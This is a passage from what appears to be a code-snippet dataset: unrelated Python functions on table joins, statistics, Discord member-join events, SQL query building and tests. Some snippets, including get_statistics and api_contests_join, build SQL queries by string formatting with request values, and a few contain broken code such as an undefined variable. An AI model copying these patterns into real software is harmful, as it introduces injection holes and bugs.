explore.name == test_explore[\"name\"]\n fields = fc.get_explore_fields(explore)\n assert isinstance(fields, list)\n assert fields == test_explore[\"all_fields\"]", "def get_statistics(self):\n statistics = {\n 'entry': 0,\n 'bandwidth': 0,\n 'exit': 0,\n 'pages': 0\n }\n downloads = statistics.copy()\n \n portal_state = getMultiAdapter(\n (self.context, self.request), name=u'plone_portal_state'\n )\n context_state = getMultiAdapter(\n (self.context, self.request), name=u'plone_context_state'\n )\n site = portal_state.portal()\n \n url = self.context.absolute_url().replace(site.absolute_url(), '')\n urls = []\n if url == '':\n url = '/'\n quoted_url = urllib.quote(url)\n \n urls.append(quoted_url)\n urls.append(quoted_url + '/view')\n canonical_url = urllib.quote(context_state.canonical_object_url())\n if canonical_url not in urls:\n urls.append(canonical_url)\n urls.append(canonical_url + '/view')\n\n query = 'SELECT * FROM statistics WHERE url IN %s' % str(tuple(urls))\n results = Session.execute(query).fetchall()\n if results:\n for row in results:\n for key in statistics.keys():\n statistics[key] = statistics[key] + int(row[key])\n\n results_dw = Session.execute(\n 'SELECT * FROM statistics WHERE url=\"%s/at_download%%\"' % quoted_url).fetchall()\n if results_dw:\n for row in rows_stat:\n for key in statistics.keys():\n downloads[key] = downloads[key] + int(row[key])\n statistics['downloads'] = downloads['pages']\n return statistics", "def num_joins(self, num_joins):\n self._num_joins = num_joins", "async def on_member_join(self, member: discord.Member) -> None:\n\n await add_user_in_db(member, member.guild)\n\n guild_from_db = await Guilds.get(guild_id=member.guild.id)\n role_saver = guild_from_db.role_saver\n if role_saver:\n user_roles = await UserRoles.get_many(guild_id=member.guild.id, user_id=member.id)\n if user_roles:\n for rol in user_roles:\n role = discord.utils.get(member.guild.roles, id=rol.role_id)\n if role.name == '@everyone':\n continue\n else:\n await member.add_roles(role)\n\n await Profiles.update(user_id=member.id,\n guild_id=member.guild.id,\n set=[\"joins = joins + 1\"])\n await Guilds.update(guild_id=member.guild.id,\n set=[\"day_joins = day_joins + 1\"])\n\n await self.refresh_user_count_channel(member.guild)", "async def on_guild_join(self, guild):\n l.info(f\"Joined {guild.name} with {guild.member_count} users!\")", "def community_stats(request):\n stats = cache.get(STATS_CACHE_KEY, None)\n if not stats:\n\n stats = fetch(PEOPLE_STATS_URL)\n packages_data = fetch(PACKAGES_STATS_URL)\n if 'meta' in packages_data:\n stats.update({'packages': packages_data['meta']['total_count']})\n\n stats = {'community_stats': stats}\n\n cache.add(STATS_CACHE_KEY, stats, 60 * 60 * 12) # for half a day\n\n return stats", "def joincount(pntGraph, lineGraph, criterion='', threshold=0):\n matNumDict, _ = spatialjoin._spatialjoin(pntGraph, lineGraph, criterion, threshold)\n for edge in lineGraph.edges(data=True):\n edge[2]['joinCount'] = matNumDict[edge[2]['Ind']]\n print('The join count is added to the POLYLINE type graph.')", "def ingest_joined_data(self, joined_data_buffer, ratio=0.8):\n # local join to simulate a joining workflow\n\n # update next_join_job_id and joining state\n next_join_job_id = JoinManager.name_next_join_job(experiment_id=self.experiment_id)\n self.exp_db_client.update_experiment_next_join_job_id(self.experiment_id, next_join_job_id)\n self.exp_db_client.update_experiment_joining_state(self.experiment_id, JoiningState.PENDING)\n\n self.next_join_job = 
JoinManager(\n join_db_client=self.join_db_client,\n experiment_id=self.experiment_id,\n join_job_id=next_join_job_id,\n input_obs_data_s3_path=\"local-join-does-not-apply\",\n input_reward_data_s3_path=\"local-join-does-not-apply\",\n boto_session=self.boto_session,\n )\n\n logger.info(\"Started dummy local joining job...\")\n self.next_join_job.start_dummy_join(joined_data_buffer=joined_data_buffer, ratio=ratio)\n\n # this method can be invoked either in local/SM mode\n succeeded_state = (\n self.experiment_record._joining_state == JoiningState.SUCCEEDED\n and self.experiment_record._last_joined_job_id == next_join_job_id\n and self.experiment_record._next_join_job_id is None\n )\n num_retries = 0\n\n while not succeeded_state:\n # Sync experiment state if required\n self._sync_experiment_state_with_ddb()\n logger.debug(\"Waiting for experiment table joining status to be updated...\")\n time.sleep(2 * (2 ** num_retries))\n succeeded_state = (\n self.experiment_record._joining_state == JoiningState.SUCCEEDED\n and self.experiment_record._last_joined_job_id == next_join_job_id\n and self.experiment_record._next_join_job_id is None\n )\n num_retries += 1\n if num_retries >= 5:\n raise UnhandledWorkflowException(\n f\"Joining job '{self.experiment_record._next_join_job_id}' \"\n f\"was in state of '{self.experiment_record._joining_state}'. Failed to sync table states.\"\n )\n if (\n self.experiment_record._joining_state == JoiningState.FAILED\n or self.experiment_record._joining_state == JoiningState.CANCELLED\n ):\n raise WorkflowJoiningJobException(\n f\"Joining job '{self.experiment_record._next_join_job_id}' \"\n f\"ended with state '{self.experiment_record._joining_state}'. Please check if provided \"\n \"joined_data_buffer was in correct data format.\"\n )", "def search_all_join_on(sql_dict, table_json, args, join_on_label=None):\n all_from = []\n global globe_join_on_label_count\n globe_join_on_label_count = 0\n\n sql_dict['where'] = intersect_check(sql_dict['where'])\n groupby_list = []\n groupby_top = \"\"\n re_sql = \"select distinct \" if sql_dict['select'][0] else \"select \"\n orderby_sql, table_list, agg_in_order = (\"\", [], False)\n # if args.orderby_to_subquery and is_orderby_for_subquery(sql_dict): # v1.1\n # orderby_sql,table_list,agg_in_order = (\"\",[],False)\n # else:\n # orderby_sql,table_list,agg_in_order = create_order_by(sql_dict['orderBy'],sql_dict['limit'])\n\n # Get table info from select column\n for column in sql_dict['select'][1]:\n table = column[1][1][1].split('.')[0].lower()\n if not table in table_list:\n table_list.append(table)\n select_unit = select_unit_back(column)\n if not (column[0] or column[1][1][0]):\n groupby_list.append(select_unit)\n re_sql += select_unit + ' , '\n re_sql = re_sql[:-3]\n top_select_table_list = copy.deepcopy(table_list)\n # Add table info to select column\n break_idx, table_list, next_sql, sql_where, sql_having, orderby_sql_, next_table_list = get_where_column(sql_dict,\n table_list,\n 0, SQL_TOP,\n table_json,\n args)\n if break_idx < 0 or next_sql == SQL_TOP:\n orderby_sql, table_list_order, agg_in_order = create_order_by(sql_dict['orderBy'], sql_dict['limit'])\n for order_t in table_list_order:\n if order_t.lower() not in table_list:\n table_list.append(order_t.lower())\n\n if sql_dict['groupBy']: # V1.1:\n groupby_top = \" group by \" + col_unit_back(sql_dict['groupBy'][0])\n elif (len(groupby_list) != len(sql_dict['select'][1]) and groupby_list) or sql_having.strip() != '' or (\n agg_in_order and groupby_list) or 
orderby_sql_.strip():\n if args.group_for_exact_match and len(groupby_list) > 1:\n groupby_list = infer_group_for_exact_match(groupby_list, table_json)\n groupby_top = \" group by \" + \",\".join(groupby_list)\n\n orderby_sql += orderby_sql_\n from_table_net, table_fk_list = get_table_network(table_json, table_list, join_on_label)\n\n from_table_netss, _ = get_table_network(table_json, table_list, join_on_label, False)\n all_from.append(from_table_netss)\n\n top_sql_list = [re_sql]\n re_sql += create_from_table(from_table_net, table_json['table_names_original'],\n table_json['table_column_names_original'], table_fk_list)\n top_sql_list.append(re_sql + sql_where + groupby_top + sql_having)\n\n if sql_dict['where']:\n while next_sql:\n table_list = next_table_list # []#V1.2\n if next_sql == SQL_TOP:\n sub_sql = \" \" + sql_dict['where'][break_idx][:-1] + \" \" + top_sql_list[0]\n table_list = top_select_table_list\n start_new_top_sql = True\n else:\n select_column = col_unit_back(sql_dict['where'][break_idx][3])\n sub_sql = \"select \" + select_column\n if sql_dict['where'][break_idx][3][1].split('.')[0].lower() not in table_list:\n table_list.append(sql_dict['where'][break_idx][3][1].split('.')[0].lower())\n start_new_top_sql = False\n\n break_idx, table_list, next_sql, sql_where, sql_having, orderby_sql_, next_table_list = get_where_column(\n sql_dict, table_list, break_idx + 1, next_sql, table_json, args)\n if args.orderby_to_subquery and not orderby_sql_:\n orderby_sql_, table_list = orderby_to_subquery(sql_dict, table_list) # v1.1\n\n # if not start_new_top_sql:\n from_table_net, table_fk_list = get_table_network(table_json, table_list, join_on_label)\n from_table_netss, _ = get_table_network(table_json, table_list, join_on_label, False)\n all_from.append(from_table_netss)\n sub_sql += create_from_table(from_table_net, table_json['table_names_original'],\n table_json['table_column_names_original'], table_fk_list)\n\n # if sql_where.strip() != 'where':\n sub_sql += sql_where\n\n if not start_new_top_sql:\n # if (sql_having.strip() and select_column) or (orderby_sql_.strip() and select_column):#v1.0\n if (sql_having.strip() and select_column) or ((\n \"max(\" in orderby_sql_ or \"min(\" in orderby_sql_ or \"count(\" in orderby_sql_ or \"sum(\" in orderby_sql_ or \"avg(\" in orderby_sql_) and select_column): # v1.0\n sub_sql += \" group by \" + select_column\n else:\n if groupby_top.strip():\n sub_sql += groupby_top\n elif (sql_having.strip() != '' and groupby_list) or (orderby_sql_.strip() and groupby_list):\n sub_sql += \" group by \" + \",\".join(groupby_list)\n\n sub_sql += sql_having + orderby_sql_\n\n if start_new_top_sql:\n top_sql_list.append(sub_sql)\n else:\n top_sql_list[len(top_sql_list) - 1] = top_sql_list[len(top_sql_list) - 1].replace('@@@', sub_sql, 1)\n\n re_sql = \"\"\n for idx, sql in enumerate(top_sql_list):\n if idx > 0:\n re_sql += sql\n\n re_sql += orderby_sql\n\n return re_sql, all_from, sql_dict", "def on_join_data(self, data):\n self.users.client.key = data[7] # unique user identifier ?\n self.users.client.join_time = data[11] # join time as unix including milliseconds ?\n self._room_id = data[13] # room id\n\n self.send_connection_ok()\n\n if config.DEBUG_TO_CONSOLE:\n print ('Join Data:')\n for i, v in enumerate(data):\n print ('\\t[%s] - %s' % (i, v))", "def test_combine_peer_stats(self):\n tracts = Geo.objects.filter(geo_type=Geo.TRACT_TYPE, cbsa=request.GET.get('metro'))\n metro = Geo.objects.get(geo_type=Geo.METRO_TYPE, geoid=request.GET.get('metro'))\n 
lender = Institution.objects.get(institution_id=request.GET.get('lender'))\n peers = lender.get_peer_list(metro, None, None)\n peer_data_collector = []\n for peer in peers:\n peer_request = HttpRequest()\n peer_request.GET['lender'] = peer.institution.institution_id\n peer_request.GET['metro']= metro.geoid\n peer_lar_data = loan_originations_as_json(peer_request)\n peer_data_collector.append(assemble_stats(peer_lar_data, tracts))\n peer_stats = combine_peer_stats(peer_data_collector)\n self.assertEqual(peer_stats['hma_pct'], 0.0)\n self.assertEqual(peer_stats['lma_pct'], 1.0)\n self.assertEqual(peer_stats['mma_pct'], 0.0)\n self.assertEqual(peer_stats['lma'], 7)\n self.assertEqual(peer_stats['mma'], 0)\n self.assertEqual(peer_stats['hma'], 0)\n self.assertEqual(peer_stats['lar_total'], 7)", "def raw_joins(self):\n return self.obj_payload[\"joins\"]", "def fetch_metrics(self):\n\n self.explain_all_indices()", "def get_joins(self, p, vv):\n self._get_joins(p, vv)", "def get_workspace_share_details():\n\n # connect to mysql\n db_connection = mysql.connect(\n host=sql_host, user=\"metrics\", passwd=metrics_mysql_password, database=\"metrics\"\n )\n\n cursor = db_connection.cursor()\n query = \"use \" + query_on\n cursor.execute(query)\n\n workspaces_dict = get_workspaces(db_connection)\n kb_staff = get_kbase_staff(db_connection)\n (workspaces_dict, max_shared_count) = get_workspace_shares(\n workspaces_dict, kb_staff\n )\n\n ################\n # Print the header line:\n ################\n header_line = (\n \"Narrative ID\\tOwner\\tCreation Date\\tLast Modified\\tis_deleted\\tis_public\"\n )\n for i in range(max_shared_count):\n header_line += \"\\tShared_person_{}\\tShare_Type_{}\\tis_KB_Staff_{}\".format(\n str(i + 1), str(i + 1), str(i + 1)\n )\n print(header_line)\n\n ###############\n # Print the WS rows\n ###############\n for ws_id in workspaces_dict:\n print(\n \"{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\".format(\n str(ws_id),\n workspaces_dict[ws_id][\"username\"],\n workspaces_dict[ws_id][\"creation_date\"],\n workspaces_dict[ws_id][\"mod_date\"],\n str(workspaces_dict[ws_id][\"is_deleted\"]),\n str(workspaces_dict[ws_id][\"is_public\"]),\n \"\\t\".join(workspaces_dict[ws_id][\"shares_list\"]),\n )\n )", "def api_contests_join():\n if request.method == 'GET':\n user = get_queryparam('user')\n returnJSON = models.select_joined_contest(\n params=('*'),\n conditions=('{}=\\\"{}\\\"'.format(\n settings.DB_COLUMNS.JOINED_CONTEST_USER,\n user\n )\n )\n )\n return jsonify(returnJSON)\n elif request.method == 'POST':\n postJSON = request.get_json()\n models.insert_joined_contest(\n postJSON[settings.DB_COLUMNS.JOINED_CONTEST_USER],\n postJSON[settings.DB_COLUMNS.JOINED_CONTEST_CONTEST]\n )\n return ('', 204)\n elif request.method == 'DELETE':\n postJSON = request.get_json()\n models.delete_joined_contest(\n postJSON[settings.DB_COLUMNS.JOINED_CONTEST_USER],\n postJSON[settings.DB_COLUMNS.JOINED_CONTEST_CONTEST]\n )\n return ('', 204)", "def get_joins(self):\n\t\tprint('connecting to Sql Server:\\n\\tserver: {server}\\n\\tdatabase: {database}'.format(**self.__dict__))\n\t\t# Child: <schema>.<table>\n\t\t# Parent: <schema>.<table>\n\t\t# Column: <column>\n\t\tJoin = namedtuple('Join', 'Child,Column,Datatype,Parent')\n\t\twith pymssql.connect(self.server, self.user, self.password, self.database) as conn:\n\t\t\t# read sql source file\n\t\t\tprint('reading query_file: {}'.format(self.query_file))\n\t\t\twith open(self.query_file) as sqlfile:\n\t\t\t\tquery = sqlfile.read()\n\t\t\t\t# connect to SQL 
Server\n\t\t\t\t# init query\n\t\t\t\tcur = conn.cursor()\n\t\t\t\tprint('executing query')\n\t\t\t\tcur.execute(query)\n\t\t\t\t# load query results into list of namedtuple python data structure\n\t\t\t\tself.joins = [j for j in map(Join._make, cur)]\n\t\t\t\t# leave file, sql connection contexts", "def join_ids(self) -> List[int]:\n return self._join_ids", "def stats():\n return jsonify(shorten.get_stats(get_db(), app.config['MINI_URL_BASE']))", "def _get_open_projects_info():\n projects = Project.objects.filter(project_open=True).order_by(\"created_at\")\n projects_sum_hours = []\n for project in projects:\n time_entries_pro_project = TimeEntry.objects.filter(project=project)\n used_hours = _sum_hours(time_entries_pro_project)\n hours_percent = _calculate_hours_percent(used_hours, project.stimated_hours)\n projects_sum_hours.append(\n {\n \"hours_percent_number\": hours_percent,\n \"hours_percent\": f\"{hours_percent}%\",\n \"worked_hours\": used_hours,\n \"project\": project,\n }\n )\n return projects_sum_hours", "async def on_member_join(self, member: discord.Member) -> None:\n\n # retrieve logging information\n if logging_info := (await typed_retrieve_query(\n self.bot.database,\n PartialLoggingAction,\n 'SELECT CHANNEL_ID, BITS FROM LOGGING WHERE GUILD_ID=?',\n (member.guild.id,))\n ):\n await log_to_channel(\n self.bot,\n LoggingActions.USER_JOINED,\n logging_info[0].bits,\n logging_info[0].channel_id,\n f'**{str(member)}** joined the guild.'\n )", "def getJoinedFields(self, join_name):\n result = []\n objects_cls = self.getClass()\n if objects_cls:\n from cdb.platform.mom import entities, fields\n cls = entities.Class.ByKeys(objects_cls._getClassname())\n result = [f.field_name for f in cls.DDAllFields\n if isinstance(f, fields.DDJoinedField) and f.join_alias == join_name]\n return result", "def process_join(data: JoinedQueryData, verbose: bool) -> str:\n # The collection (sometimes referred to as \"type\" in the docs) to join\n string = 'type:' if verbose else ''\n string += str(data.collection)\n # The fields used to link the two collections\n if (parent := data.field_on) is not None:\n string += f'^on:{parent}'\n if (child := data.field_to) is not None:\n string += f'^to:{child}'\n # Flags\n if (is_list := data.is_list) or verbose:\n string += '^list:' + ('1' if is_list else '0')\n if not (is_outer := data.is_outer) or verbose:\n string += '^outer:' + ('1' if is_outer else '0')\n # Show/hide field lists\n if show := data.show:\n string += '^show:' + '\\''.join(str(s) for s in show)\n elif hide := data.hide:\n string += '^hide:' + '\\''.join(str(s) for s in hide)\n # Inject at name\n if (name := data.inject_at) is not None:\n string += f'^inject_at:{name}'\n # QueryBase terms\n if terms := data.terms:\n string += '^terms:' + '\\''.join(t.serialise() for t in terms)\n # Process nested (inner) joins\n if joins := data.joins:\n string += f'({\",\".join(process_join(j, verbose) for j in joins)})'\n return string", "def get_host_stats(self, refresh=False):", "def fetch_info():\n global JOLOKIA_CONNECTIONS\n for connection in JOLOKIA_CONNECTIONS.keys():\n try:\n data = JOLOKIA_CONNECTIONS[connection]['j4p'].getRequests()\n for ele in data:\n parse_info(ele, JOLOKIA_CONNECTIONS[connection]['instance'])\n except Exception, e:\n collectd.error('jolokia plugin: Error at jolokia endpoint %s - %r' % (connection, e))", "def GetStats(self):\r\n\t\tArg1 = self.href\r\n\t\treturn self._execute('GetStats', payload=locals(), response_object=None)", "def get_visits(visit_container):\r\n return 
visit_container.visits.all()", "def get_statistic():\n try:\n data = r.table('interests').run(g.rdb_conn)\n except Exception as e:\n add_to_log('error during get statistic', e)\n return e, 500\n else:\n results = []\n for i in data.items:\n results.append(i['interests'])\n return json.dumps(results)", "def get_buildbot_stats(time_window : datetime.datetime) -> BuildStats:\n print('getting list of builders...')\n stats = BuildStats()\n for builder in requests.get(BASE_URL).json().keys():\n # TODO: maybe filter the builds to the ones we care about\n stats += get_builder_stats(builder, time_window )\n return stats", "def test_get_explore_fields_gets_fields_for_dimension_or_measure_only_explores(\n fc: fetcher.Fetcher, test_model, test_dimensions_or_measures_only_explores\n):\n expected = test_dimensions_or_measures_only_explores[0]\n explore = fc.get_explores(model=test_model[\"name\"], explore=expected[\"name\"])\n assert isinstance(explore, list)\n actual = explore[0]\n assert actual.name == expected[\"name\"]\n assert not (actual.fields.dimensions and actual.fields.measures)\n expected_fields = [f[\"name\"] for f in expected[\"fields\"]]\n actual_fields = fc.get_explore_fields(actual)\n assert actual_fields == expected_fields", "def get_metrics(session, fill_id, population_id, properties_id, aggregations_id, label_lang):\n prop_id = properties_id.id\n properties = properties_id.properties\n property_query_cols = generate_json_expansion_values(properties)\n\n query_cols = [*property_query_cols, metric.bias_value, metric.total]\n\n metrics_q = session.query(*query_cols) \\\n .join(metric_properties_j, metric.properties_id == metric_properties_j.id) \\\n .join(metric_aggregations_j, metric.aggregations_id == metric_aggregations_j.id) \\\n .filter(metric.properties_id == prop_id) \\\n .filter(metric.fill_id == fill_id) \\\n .filter(metric.population_id == population_id) \\\n .order_by(metric.aggregations_id)\n if isinstance(aggregations_id, int):\n metrics_q = metrics_q.filter(metric.aggregations_id == aggregations_id)\n if isinstance(aggregations_id, list):\n metrics_q = metrics_q.filter(metric.aggregations_id.in_(aggregations_id))\n if isinstance(aggregations_id, dict):\n for prop_pos, (prop_id, val) in enumerate(aggregations_id.items()):\n if val == 'all':\n continue\n else:\n prop_pos_after_bias = prop_pos + 1\n a_man = aliased(metric_aggregations_n)\n val_predicate = val(a_man.value) if callable(val) else a_man.value == val\n metrics_q = metrics_q.join(a_man, and_(metric.aggregations_id == a_man.id,\n a_man.aggregation_order == prop_pos_after_bias,\n a_man.property == prop_id,\n val_predicate))\n\n # if a label_lang is defined we need to make a subquery\n if label_lang is not None:\n metrics_subq = metrics_q.subquery('metrics_driver')\n metrics_q = label_metric_query(session, metrics_subq, properties, label_lang)\n\n log.debug(f'metrics_q is:'\n f' {metrics_q.statement.compile(compile_kwargs={\"literal_binds\": True})}')\n metrics = metrics_q.all()\n metrics_columns = metrics_q.column_descriptions\n log.debug(f'Number of metrics to return are {len(metrics)}')\n return metrics, metrics_columns", "async def on_member_join(member: Member):\n await member_handler.member_joined(member)", "def join(self, *joins, jtype='inner'):\n assert jtype in ('inner', 'outer')\n for j in joins:\n self._joins.append(f'{jtype} join {j}')\n return self", "def test_communities_joined_limit(self):\n self.assertEqual(settings.QUIZZZ_JOINED_COMMUNITIES_LIMIT, 20)\n\n with 
self.settings(QUIZZZ_JOINED_COMMUNITIES_LIMIT=3):\n self.login_as(\"admin\")\n for i in range(settings.QUIZZZ_JOINED_COMMUNITIES_LIMIT):\n response = self.client.post(reverse('communities:create-community'), {\"name\": f\"test-group-{i}\"})\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n self.login_as(\"ben\")\n for i in range(settings.QUIZZZ_JOINED_COMMUNITIES_LIMIT):\n response = self.client.post(self.url, {\"name\": f\"test-group-{i}\"})\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n response = self.client.post(self.url, self.payload)\n self.assert_validation_failed(response, \n data=[\"You have reached the limit for communities joined.\"])", "def compute_graph_stats():\n\n #create a dictionary to hold the stats\n #note that it's set up as a defaultdict of defaultdicts, so as not to have\n #to create the structure ahead of time (the \"pretty\" is so it can be\n #pretty-printed for debugging purposes)\n stats = PrettyDefaultDict(lambda: PrettyDefaultDict(list))\n\n #compute the stats and add them to the dictionary\n for search_type in [\"BFS\", \"DFS\"]:\n for word_length in range(2, 11):\n\n #get all the relevant searches out of the database\n searches = (\n Search.query.filter(Search.search_type == search_type,\n Search.word_length == word_length)\n .all())\n\n #compute and store medians for path length, search time,\n #efficiency, and words explored\n med_path_length = median([search.med_path_length\n for search in searches])\n stats[\"pathLength\"][search_type].append(\n int(round(med_path_length)))\n\n\n med_search_time = median([search.med_search_time\n for search in searches])\n stats[\"searchTime\"][search_type].append(\n round(med_search_time, 1))\n\n\n med_efficiency = median([search.med_efficiency\n for search in searches])\n stats[\"efficiency\"][search_type].append(\n round(100 * med_efficiency, 1))\n\n\n med_words_explored = median([search.med_words_explored\n for search in searches])\n stats[\"wordsExplored\"][search_type].append(\n int(round(med_words_explored)))\n\n\n #add metadata to the dictionary for graphing purposes\n stats[\"wordLengths\"] = range(2, 11)\n stats[\"pathLength\"][\"yAxisLabel\"] = \"num words in path\"\n stats[\"searchTime\"][\"yAxisLabel\"] = \"search time (ms)\"\n stats[\"wordsExplored\"][\"yAxisLabel\"] = \"num words explored\"\n stats[\"efficiency\"][\"yAxisLabel\"] = \"% of explored words used\"\n\n # pprint(stats)\n\n return stats", "def on_join(data):\n print(str(data))\n if models.Leaderboard.query.filter_by(\n username=data['user']).first() is None:\n add_user(data['user'])\n users, scores = calculate_scores()\n socketio.emit('leaderboard_info', {'users': users, 'scores': scores})", "def test_join_after_invite(self) -> None:\n\n self._perform_background_initial_update()\n\n u1 = self.register_user(\"u1\", \"pass\")\n u1token = self.login(\"u1\", \"pass\")\n r1 = self.helper.create_room_as(u1, tok=u1token)\n\n u2 = self.register_user(\"u2\", \"pass\")\n u2token = self.login(\"u2\", \"pass\")\n\n self.helper.invite(r1, u1, u2, tok=u1token)\n\n r1stats_ante = self._get_current_stats(\"room\", r1)\n assert r1stats_ante is not None\n\n self.helper.join(r1, u2, tok=u2token)\n\n r1stats_post = self._get_current_stats(\"room\", r1)\n assert r1stats_post is not None\n\n self.assertEqual(\n r1stats_post[\"current_state_events\"] - r1stats_ante[\"current_state_events\"],\n 0,\n )\n self.assertEqual(\n r1stats_post[\"joined_members\"] - r1stats_ante[\"joined_members\"], +1\n )\n self.assertEqual(\n 
r1stats_post[\"invited_members\"] - r1stats_ante[\"invited_members\"], -1\n )", "def get_statistics(self):\n with self._conn.begin():\n stats = dict(\n self._conn.execute(\n \"SELECT * FROM get_statistics()\"\n ).first().items()\n )\n stats['builds_last_hour'] = {\n row.abi_tag: row.builds\n for row in self._conn.execute(\n \"SELECT * FROM get_builds_last_hour()\"\n )\n }\n return stats", "def on_join(bot, trigger):\n\tfor channel in trigger.args[0].split(','):\n\t\tlog(bot, channel, '*** {} has joined {}', trigger.nick, channel);", "def outlet_stats(args: Dict[str, Any]) -> List[object]:\n query = [\n {\n \"$match\": {\n \"body\": {\"$ne\": \"\"},\n \"quotesUpdated\": {\"$exists\": True},\n \"outlet\": {\"$in\": args[\"outlets\"]},\n \"publishedAt\": {\n \"$gte\": args[\"begin_date\"],\n \"$lt\": args[\"end_date\"] + timedelta(days=1),\n },\n }\n },\n {\n \"$group\": {\n \"_id\": \"$outlet\",\n \"totalArticles\": {\"$sum\": 1},\n \"totalQuotes\": {\"$sum\": \"$quoteCount\"},\n \"peopleFemaleCount\": {\"$sum\": \"$peopleFemaleCount\"},\n \"peopleMaleCount\": {\"$sum\": \"$peopleMaleCount\"},\n \"peopleUnknownCount\": {\"$sum\": \"$peopleUnknownCount\"},\n \"sourcesFemaleCount\": {\"$sum\": \"$sourcesFemaleCount\"},\n \"sourcesMaleCount\": {\"$sum\": \"$sourcesMaleCount\"},\n \"sourcesUnknownCount\": {\"$sum\": \"$sourcesUnknownCount\"},\n \"authorsFemaleCount\": {\"$sum\": \"$authorsFemaleCount\"},\n \"authorsMaleCount\": {\"$sum\": \"$authorsMaleCount\"},\n \"authorsUnknownCount\": {\"$sum\": \"$authorsUnknownCount\"},\n }\n },\n ]\n return query", "def test_join_first_time(self) -> None:\n\n self._perform_background_initial_update()\n\n u1 = self.register_user(\"u1\", \"pass\")\n u1token = self.login(\"u1\", \"pass\")\n r1 = self.helper.create_room_as(u1, tok=u1token)\n\n u2 = self.register_user(\"u2\", \"pass\")\n u2token = self.login(\"u2\", \"pass\")\n\n r1stats_ante = self._get_current_stats(\"room\", r1)\n assert r1stats_ante is not None\n\n self.helper.join(r1, u2, tok=u2token)\n\n r1stats_post = self._get_current_stats(\"room\", r1)\n assert r1stats_post is not None\n\n self.assertEqual(\n r1stats_post[\"current_state_events\"] - r1stats_ante[\"current_state_events\"],\n 1,\n )\n self.assertEqual(\n r1stats_post[\"joined_members\"] - r1stats_ante[\"joined_members\"], 1\n )", "def minion_connection_stats(self, minions):\n\n online_minions = list()\n offline_minions = list()\n expired_minions = list()\n\n for minion_obj in minions:\n\n # get UTC current date time\n current_datetime = datetime.datetime.utcnow()\n current_datetime = current_datetime.replace(tzinfo=pytz.utc)\n\n # get the last seen date time\n last_seen = minion_obj.last_seen\n\n # get the time difference\n try:\n delta_diff = current_datetime - last_seen\n except Exception as err:\n delta_diff = None\n\n if delta_diff:\n days_count = delta_diff.days\n else:\n # just to make sure if empty datetime is handled\n days_count = 99999\n\n # is minion up since x days\n if days_count >= settings.MINION_EXPIRY:\n expired_minions.append(minion_obj)\n\n # get a list of minions up\n elif minion_obj.is_minion_up:\n online_minions.append(minion_obj)\n\n # get all offline minions\n elif not minion_obj.is_minion_up:\n offline_minions.append(minion_obj)\n\n return dict(online_minions=len(online_minions),\n expired_minions=len(expired_minions),\n offline_minions=len(offline_minions))", "def _get_adjoining_hashes(self, hashcode, precision):\n if precision > len(hashcode):\n raise ValueError('Precision greater than hashcode size.')\n 
reduced_hash = hashcode[:precision]\n\n return geohash.neighbors(reduced_hash)", "async def cmd_stats(self, ctx):\n\n guild = ctx.guild\n members = await guild.fetch_members().flatten()\n answer = f''\n embed = discord.Embed(title=\"Statistiken\",\n description=f'Wir haben aktuell {len(members)} Mitglieder auf diesem Server, verteilt auf folgende Rollen:')\n\n for role in guild.roles:\n if not self.get_key(role):\n continue\n role_members = role.members\n if len(role_members) > 0 and not role.name.startswith(\"Farbe\"):\n embed.add_field(name=role.name, value=f'{len(role_members)} Mitglieder', inline=False)\n\n no_role = 0\n for member in members:\n # ToDo Search for study roles only!\n if len(member.roles) == 1:\n no_role += 1\n\n embed.add_field(name=\"\\u200B\", value=\"\\u200b\", inline=False)\n embed.add_field(name=\"Mitglieder ohne Rolle\", value=str(no_role), inline=False)\n\n await ctx.channel.send(answer, embed=embed)", "def cluster_create_join_progress_get(self, desired_attributes=None):\n return self.request( \"cluster-create-join-progress-get\", {\n 'desired_attributes': [ desired_attributes, 'desired-attributes', [ ClusterCreateJoinProgressInfo, 'None' ], False ],\n }, {\n 'attributes': [ ClusterCreateJoinProgressInfo, False ],\n } )", "def testCorrectJoin(self):\n b_tree = OOBTree()\n b_tree.update({1: \"Monkey D. Luffy\", 2: \"Roronoa Zoro\", 3: \"Nami\"})\n failed_counter = 0\n key = 1\n data = {\"from\":\"East Blue\"}\n (mod_data, mod_tree, failed_counter) = self.processing.join(b_tree, key, data, failed_counter)\n self.assertEqual(mod_data, {\"from\":\"East Blue\", \"right_data\":\"Monkey D. Luffy\"})\n self.assertEqual(len(mod_tree), 2)\n self.assertEqual(failed_counter, 0)", "def encoding_join_conditions(self):\n\n all_conditions = self.get_all_join_conditions()\n db_info = get_db_info('imdb')\n all_columns = db_info['flatten_columns']\n join_info = get_join_info('imdb')\n columns_num = len(all_columns)\n # TODO sparse matrix\n join_weight_matrix = np.zeros((columns_num, columns_num))\n join_vector = np.zeros((columns_num, 1))\n for condition in all_conditions:\n assert condition.function == 'eq'\n assert len(condition.args) == 2\n c_i, c_j = condition.args\n if (c_i, c_j) in db_info:\n selctivity = db_info[(c_i, c_j)]\n i, j = all_columns.index(c_i), all_columns.index(c_j)\n join_weight_matrix[i][j] = selctivity\n join_vector[i] = np.array([1])\n # build symmetric adjacency matrix\n\n adj = normalize(join_weight_matrix +\n np.eye(join_weight_matrix.shape[0]))\n return adj, join_vector", "def features_websessions(df_customers, df_websessions):\n df_websessions = df_customers.join(df_websessions, \"customerId2\", 'inner')\n res_counts = df_websessions.groupBy('customerId2').count().alias('nb_sessions')\n\n res_agg = df_websessions.groupBy('customerId2').agg(\n min('pageViewCount').alias('min_pageViewCount'),\n mean('pageViewCount').alias('mean_pageViewCount'),\n max('pageViewCount').alias('max_pageViewCount'),\n (count(when(df_websessions.pageViewCount != 0, True)) / count('customerId2')).alias('p_not0_pageViewCount'),\n\n min('nonPageViewEventsCount').alias('min_nonPageViewEventsCount'),\n mean('nonPageViewEventsCount').alias('mean_nonPageViewEventsCount'),\n max('nonPageViewEventsCount').alias('max_nonPageViewEventsCount'),\n (count(when(df_websessions.nonPageViewEventsCount != 0, True)) / count('customerId2')).alias(\n 'p_not0_nonPageViewEventsCount'),\n\n min('productViewCount').alias('min_productViewCount'),\n 
